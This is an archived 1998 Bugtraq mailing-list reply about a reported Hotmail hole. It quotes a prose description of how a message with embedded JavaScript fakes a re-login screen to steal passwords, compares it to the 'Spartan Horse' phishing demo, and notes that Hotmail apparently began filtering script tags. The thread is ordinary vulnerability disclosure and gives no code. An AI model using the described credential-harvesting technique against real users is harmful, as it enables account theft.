[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Re: Serious Security Hole in Hotmail
From: "Jonathan A. Zdziarski - Systems Administrator" <jonz () CARTMAN ! NETRAIL ! NET>
Date: 1998-08-25 20:31:47
[Download RAW message or body]
it appears that hotmail put a fix in this by s/<script>/<comment>/ or
some variation, when you view a message.
On Tue, 25 Aug 1998, Jeff Mcadams wrote:
> Thus spake Tom Cervenka
>
> >We have just found a serious security hole in Microsoft's Hotmail
> >service (http://www.hotmail.com) which allows malicious users to easily
> >steal the passwords of Hotmail users. The exploit involves sending an
> >e-mail message that contains embedded javascript code. When a Hotmail
> >user views the message, the javascript code forces the user to re-login
> >to Hotmail. In doing so, the victim's username and password is sent to
> >the malicious user by e-mail. (see
> >http://www.because-we-can.com/hotmail/default.htm for demo)
>
> This is a variation on the Spartan Horse announced by Dan Gregorie over
> a week ago, and covered on news.com on the 14th. The Spartan Horse is
> available for viewing at:
> http://www.thetopoftheworld.com
> The news.com articles, is at:
> http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
>
> The variation is that the Spartan Horse, as design on the
> www.thetopoftheworld.com site mimicks the Windows95/98
> Dial-Up-Networking dialog box.
>
> This wasn't originally sent to BUGTRAQ because it doesn't exploit a
> specific flaw in programming code in any software, like this "Hot"Mail
> exploit. Perhaps that was an oversight on Dan's and my fault, but I
> did want to set the record straight on the origination of this idea for
> Dan's sake.
> --
> Jeff McAdams Email: jeffm@iglou.com
> Head Network Administrator Voice: (502) 966-3848
> IgLou Internet Services (800) 436-4456
>
Thank you,
Jonathan A. Zdziarski
Senior Systems Administrator
Netrail, Inc.
888.NET.RAIL x242
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic